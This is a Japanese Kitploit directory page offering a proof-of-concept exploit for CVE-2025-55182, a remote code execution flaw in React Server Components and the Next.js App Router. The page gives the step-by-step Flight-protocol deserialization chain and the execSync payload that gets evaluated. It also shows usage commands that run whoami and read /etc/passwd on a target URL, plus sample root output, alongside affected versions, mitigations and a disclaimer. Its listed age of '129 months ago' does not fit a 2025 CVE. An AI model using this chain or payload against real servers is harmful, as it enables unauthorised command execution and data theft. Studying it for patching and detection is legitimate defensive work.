Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182_PoC — Next.js App RouterにおけるReact Flightプロトコルを悪用するCVE‑2025‑55182の概念実証RCE | Kitploit
ツール/GitHubGitHub/rl0x01/cve-2025-55182_poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubrl0x01/cve-2025-55182_poc

CVE-2025-55182_PoC

Next.js App RouterにおけるReact Flightプロトコルを悪用するCVE‑2025‑55182の概念実証RCE

リポジトリを見る
129ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 - React Server Components RCE PoC

著者: rl0x01

説明

CVE-2025-55182 は、Flight プロトコルを介して React Server Components に影響を与える重大な (CVSS 10.0) リモートコード実行 (RCE) 脆弱性です。

影響を受けるバージョン

Next.jsReact
14.3.0-canary.77 ~ 15.0.419.0.0
15.1.1-canary.0 ~ 15.1.819.1.0
15.2.0-canary.0 ~ 15.2.519.1.1
15.3.0-canary.0 ~ 15.3.519.2.0
15.4.0-canary.0 ~ 15.4.7
15.5.1-canary.0 ~ 15.5.6
16.0.0-canary.0 ~ 16.0.6

修正済みバージョン

Next.js
15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+

悪用メカニズム

  1. $@ を使用して生の Chunk 参照を取得する
  2. $1:__proto__:then を介して .then を Chunk.prototype.then で上書きする
  3. status を resolved_model に設定して initializeModelChunk をトリガーする
  4. $B1337 を使用して Blob のデシリアライズをトリガーする
  5. _formData.get を Function コンストラクタに指定する
  6. _prefix には実行する JS コードが含まれる

コードは以下によって評価されます:

root@kitploit:~
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")

インストール

root@kitploit:~
pip install -r requirements.txt

使用方法

ターゲットが脆弱かどうかを確認

root@kitploit:~
python cve_2025_55182_poc.py https://target.com --check-only

コマンドの実行

root@kitploit:~
# Default command (id)
python cve_2025_55182_poc.py https://target.com

# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"

オプション

OptionDescription
urlターゲット URL (必須)
-c, --command実行するコマンド (デフォルト: id)
--check-only脆弱性の確認のみ行う
-t, --timeoutタイムアウト (秒単位、デフォルト: 15)
-v, --verbose詳細出力
--raw生のレスポンスを表示

脆弱なテスト環境

root@kitploit:~
cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000

出力例

root@kitploit:~
+======================================================================+
|  CVE-2025-55182 - React Server Components RCE                     |
|  React Flight Protocol Deserialization Vulnerability               |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01

[*] Target: http://localhost:3000
[*] Timeout: 15s

[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received

[2/2] Executing command: whoami
[+] Payload sent!

============================================================
RESULT: whoami
============================================================
root
============================================================

プロジェクト構造

root@kitploit:~
CVE-2025-55182/
├── cve_2025_55182_poc.py    # Main exploit script
├── requirements.txt          # Python dependencies
├── README.md                 # Documentation
└── vulnerable-app/           # Vulnerable Next.js app for testing
    ├── package.json
    ├── next.config.js
    └── app/
        ├── layout.js
        ├── page.js
        └── actions.js

免責事項

⚠️ このツールは教育目的および許可されたセキュリティテスト目的でのみ提供されます。

このツールを、所有していない、または明示的な許可を得ていないシステムに対して不正に使用することは違法です。

緩和策

  1. Next.js のアップデート を 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+、または 16.0.7+ に
  2. React のアップデート をパッチ適用済みバージョンに
  3. WAF ルールを実装して悪意のある Flight プロトコルペイロードをブロックする
ツールをダウンロード